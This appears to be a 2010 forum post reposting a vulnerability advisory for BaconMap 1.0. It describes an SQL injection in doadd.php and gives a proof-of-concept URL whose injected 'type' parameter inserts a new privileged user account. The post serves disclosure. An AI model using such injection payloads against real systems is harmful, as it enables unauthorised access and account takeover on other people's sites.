Professional Webmasters Community
Would you like to react to this message? Create an account in a few clicks or log in to continue.

BaconMap 1.0 SQL Injection

Go down

BaconMap 1.0 SQL Injection Empty BaconMap 1.0 SQL Injection

Post  andry Tue Oct 19, 2010 2:24 am

Software:- BaconMap 1.0

Vulnerability:- SQL Injection

Tested On:- Windows Vista + XAMPP

Date:- 10/10/2010

Description:-
An SQL injection vulnerability in BaconMap 1.0 can be exploited to insert data into any table.


Proof of Concept:-

Code:

http://localhost/baconmap/doadd.php?type=user%20(email,level,password)%20values%20('test@test.com',256,md5('Password1'));%23&name=
andry
andry
Moderator
Moderator

Posts : 467
Join date : 2010-05-07

Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum